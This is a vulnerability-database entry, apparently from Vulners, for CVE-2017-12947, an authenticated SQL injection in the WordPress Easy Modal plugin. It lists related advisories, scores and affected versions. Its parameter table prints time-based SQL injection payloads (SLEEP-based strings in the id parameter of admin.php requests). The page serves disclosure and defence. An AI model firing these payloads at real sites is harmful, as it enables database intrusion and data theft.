CVE-2017-12947

🗓️ 18 Aug 2017 18:00:00Reported by mitreType

cve

cve🔗 web.nvd.nist.gov👁 47 Views🌐 WEB

Easy Modal plugin SQL injection in untrash actio

Reporter	Title	Published	Views	Family All 9
CNVD	WordPress Easy Modal Plugin SQL Injection Vulnerability	19 Aug 201700:00	–	cnvd
Cvelist	CVE-2017-12947	18 Aug 201718:00	–	cvelist
EUVD	EUVD-2017-4471	7 Oct 202500:30	–	euvd
NVD	CVE-2017-12947	18 Aug 201718:29	–	nvd
OSV	CVE-2017-12947	18 Aug 201718:29	–	osv
Prion	Sql injection	18 Aug 201718:29	–	prion
RedhatCVE	CVE-2017-12947	9 Jan 202610:37	–	redhatcve
wpexploit	Easy Modal <= 2.0.17 - Authenticated SQL Injection	7 Aug 201700:00	–	wpexploit
WPVulnDB	Easy Modal <= 2.0.17 - Authenticated SQL Injection	7 Aug 201700:00	–	wpvulndb

NVD

Node

easymodal_project easy_modalRange≤2.0.17wordpress

Source	Link
wordpress	www.wordpress.org/plugins/easy-modal/
defensecode	www.defensecode.com/advisories/DC-2017-01-007_WordPress_Easy_Modal_Plugin_Advisory.pdf

Parameter	Position	Path	Description	CWE
id[0]	query param	/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx	SQL injection via id parameter in Easy Modal plugin (unauthorized admin actions)	CWE-89
easy-modal_nonce	query param	/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx	SQL injection via id parameter in Easy Modal plugin (unauthorized admin actions)	CWE-89
action	query param	/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx	SQL injection via id parameter in Easy Modal plugin (unauthorized admin actions)	CWE-89
page	query param	/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx	SQL injection via id parameter in Easy Modal plugin (unauthorized admin actions)	CWE-89
id[0]	query param	/wp-admin/admin.php?page=easy-modal&action=delete&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx	SQL injection via id parameter in Easy Modal plugin (unauthorized admin actions)	CWE-89
easy-modal_nonce	query param	/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1	SQL injection via id[] parameter in Easy Modal plugin (untrash action)	CWE-89
_wp_http_referer	query param	/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1	SQL injection via id[] parameter in Easy Modal plugin (untrash action)	CWE-89
page	query param	/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1	SQL injection via id[] parameter in Easy Modal plugin (untrash action)	CWE-89
action	query param	/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1	SQL injection via id[] parameter in Easy Modal plugin (untrash action)	CWE-89
paged	query param	/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_http_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-modal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AND%20SLEEP(10)--%20ZpVQ&action2=-1	SQL injection via id[] parameter in Easy Modal plugin (untrash action)	CWE-89

17 Jun 2026 01:04Current

7.5High risk

Vulners AI Score7.5

CVSS 26.5

CVSS 37.2

EPSS0.01262

cve-2017-12947 easy modal wordpress sql injection admin nvd